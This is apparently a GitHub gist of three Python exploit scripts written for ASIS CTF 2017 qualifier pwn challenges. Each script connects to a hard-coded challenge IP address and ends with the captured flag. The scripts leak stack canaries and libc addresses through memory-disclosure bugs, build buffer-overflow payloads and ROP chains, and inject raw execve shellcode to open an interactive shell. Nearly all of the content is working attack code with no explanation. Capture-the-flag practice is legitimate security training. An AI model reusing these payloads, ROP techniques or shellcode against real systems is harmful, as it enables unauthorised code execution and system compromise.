Created
April 9, 2017 15:55
-
-
Save ytn86/c32f89a550d55ca07ce5e296f4d9a085 to your computer and use it in GitHub Desktop.
ASIS CTF 2017 Quals
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! python3 | |
| from ctflib import Pwn | |
| from ctflib.util import * | |
| from binascii import crc32 | |
| def exploit(cn): | |
| def menu(): | |
| return cn.read_until(b'Choice: ') | |
| def get_crc(addr, size): | |
| cn.send(b'1\n') | |
| cn.read_until(b'data: ') | |
| cn.send(str(size).encode() + b'\n') | |
| payload = b'' | |
| payload += b'A'*100 | |
| payload += pI(addr) | |
| cn.send(payload + b'\n') | |
| cn.read_until(b'CRC is: ') | |
| crc = cn.read_until(b'\n')[:-1] | |
| return crc | |
| def leak(addr): | |
| crc = [] | |
| menu() | |
| crc.append(int(get_crc(addr, 1)[2:], 16)) | |
| menu() | |
| crc.append(int(get_crc(addr+1, 1)[2:], 16)) | |
| menu() | |
| crc.append(int(get_crc(addr+2, 1)[2:], 16)) | |
| menu() | |
| crc.append(int(get_crc(addr+3, 1)[2:], 16)) | |
| addr = [] | |
| for val in crc: | |
| for i in range(0, 0x100): | |
| if crc32(pB(i)) == val: | |
| addr.append(hex(i)[2:].zfill(2)) | |
| break | |
| addr.reverse() | |
| return int(''.join(addr), 16) | |
| got_gets = 0x08049fdc | |
| libc_gets_offset = 0x5e890 | |
| libc_system_offset = 0x0003a940 | |
| libc_binsh_offset = 0x158e8b | |
| bss_size = 0x0804a040 | |
| stack = leak(bss_size) | |
| print('stack : {}'.format(hex(stack))) | |
| canary = leak(stack-0x40+0x0c) | |
| print('canary : {}'.format(hex(canary))) | |
| libc_gets = leak(got_gets) | |
| libc_base = libc_gets - libc_gets_offset | |
| libc_system = libc_base + libc_system_offset | |
| libc_binsh = libc_base + libc_binsh_offset | |
| print('libc base : {}'.format(hex(libc_base))) | |
| payload = b'' | |
| payload += b'A'*0x28 | |
| payload += pI(canary) | |
| payload += pI(0xdeadbeef)*3 | |
| payload += pI(libc_system) | |
| payload += pI(0xdeadbeef) | |
| payload += pI(libc_binsh) | |
| menu() | |
| input('attach') | |
| cn.send(payload + b'\n') | |
| cn.interact() | |
| def main(): | |
| cn = Pwn() | |
| #cn.connect('localhost', 4002) | |
| cn.connect('69.90.132.40', 4002) | |
| exploit(cn) | |
| if __name__ == '__main__': | |
| main() | |
| """ | |
| ASIS{db17755326b5df9dab92e18e43c3ee51} | |
| """ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! python3 | |
| from ctflib import Pwn | |
| from ctflib.util import * | |
| def exploit(cn): | |
| pop_rsi_r15_ret = 0x400f61 | |
| pop_rdi_ret = 0x400f63 | |
| pop_rax_rdi_ret = 0x400f8c | |
| syscall_ret = 0x400f8f | |
| mov_edx_ret = 0x400f89 | |
| libc_printf_offset = 0x00055800 | |
| libc_system_offset = 0x00045390 | |
| libc_binsh_offset = 0x0018c177 | |
| def read_value(idx): | |
| cn.read_until(b'want to get?\n') | |
| cn.send(str(idx).encode() + b'\n') | |
| if idx != 0: | |
| cn.read_until(b'Your value = ') | |
| val = cn.read_until(b'\n') | |
| return val | |
| canary = "0x" | |
| canary += hex(int(read_value(7), 10))[2:].zfill(2) | |
| canary += hex(int(read_value(6), 10))[2:].zfill(2) | |
| canary += hex(int(read_value(5), 10))[2:].zfill(2) | |
| canary += hex(int(read_value(4), 10))[2:].zfill(2) | |
| canary += hex(int(read_value(3), 10))[2:].zfill(2) | |
| canary += hex(int(read_value(2), 10))[2:].zfill(2) | |
| canary += hex(int(read_value(1), 10))[2:].zfill(2) | |
| canary += "00" | |
| canary = int(canary, 16) | |
| print('canary : {}'.format(hex(canary))) | |
| input('attach?') | |
| payload = b'' | |
| payload += b'A'*1024 | |
| payload += b'B'*8 | |
| # canary | |
| payload += pQ(canary) | |
| # RBP | |
| payload += pQ(0x4141414141414141) | |
| #ROP | |
| # Leak libc address | |
| # write(1, 0x602018-0x18-0x10, 0x50);y | |
| payload += pQ(pop_rax_rdi_ret) | |
| payload += pQ(1) | |
| payload += pQ(1) | |
| payload += pQ(pop_rsi_r15_ret) | |
| payload += pQ(0x50) | |
| payload += pQ(0x50) | |
| payload += pQ(mov_edx_ret) | |
| payload += pQ(pop_rsi_r15_ret) | |
| payload += pQ(0x602018 - 0x18 - 0x10) | |
| payload += pQ(0x602018 - 0x18 - 0x10) | |
| payload += pQ(syscall_ret) | |
| # pivot to return _start | |
| payload += pQ(pop_rdi_ret)*9 | |
| read_value(0) | |
| cn.read_until(b'comment:') | |
| cn.send(payload + b'\n') | |
| cn.recv(1024) | |
| buf = cn.recv(128) | |
| libc_printf = upQ(buf[(0x18+0x10):(0x18+0x10+0x8)]) | |
| libc_setvbuf = upQ(buf[(0x18+0x10+0x8):(0x18+0x10+0x8+0x8)]) | |
| libc_start_main = upQ(buf[(0x18+0x10+0x8+0x10):(0x18+0x10+0x8+0x18)]) | |
| libc_base = libc_printf - libc_printf_offset | |
| libc_system = libc_base + libc_system_offset | |
| libc_binsh = libc_base + libc_binsh_offset | |
| print('libc_base : {}'.format(hex(libc_base))) | |
| print('libc_system : {}'.format(hex(libc_system))) | |
| print('libc_binsh : {}'.format(hex(libc_binsh))) | |
| payload2 = b'' | |
| payload2 += b'A'*1024 | |
| payload2 += b'B'*8 | |
| payload2 += pQ(canary) | |
| payload2 += pQ(0xdeadbeef) | |
| # system('/bin/sh'); | |
| payload2 += pQ(pop_rdi_ret) | |
| payload2 += pQ(libc_binsh) | |
| payload2 += pQ(libc_system) | |
| read_value(0) | |
| cn.read_until(b'comment:') | |
| cn.send(payload2 + b'\n') | |
| cn.interact() | |
| def main(): | |
| cn = Pwn() | |
| #cn.connect('localhost', 4000) | |
| cn.connect('69.90.132.40', 4000) | |
| exploit(cn) | |
| if __name__ == '__main__': | |
| main() | |
| """ | |
| ASIS{e77c4a76d8079b330e7e78e8e3f434c4} | |
| """ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! python3 | |
| from ctflib import Pwn | |
| from ctflib.util import * | |
| import time | |
| def exploit(cn): | |
| plt_read = 0x400400 | |
| bss_buf = 0x601000 | |
| payload = b'' | |
| payload += b'A'*24 | |
| payload += pQ(0x4005c1) | |
| payload += pQ(bss_buf) | |
| payload += pQ(0) | |
| payload += pQ(plt_read) | |
| payload += pQ(bss_buf) | |
| input('aaa') | |
| cn.send(payload + b'\n') | |
| time.sleep(1) | |
| sc = b'\x90'*0x20 | |
| sc += b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' | |
| cn.send(sc + b'\n') | |
| cn.interact() | |
| def main(): | |
| cn = Pwn() | |
| cn.connect('139.59.114.220', 10001) | |
| #cn.connect('localhost', 10001) | |
| exploit(cn) | |
| if __name__ == '__main__': | |
| main() | |
| """ | |
| ASIS{y0_execstack_saves_my_l1f3} | |
| """ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment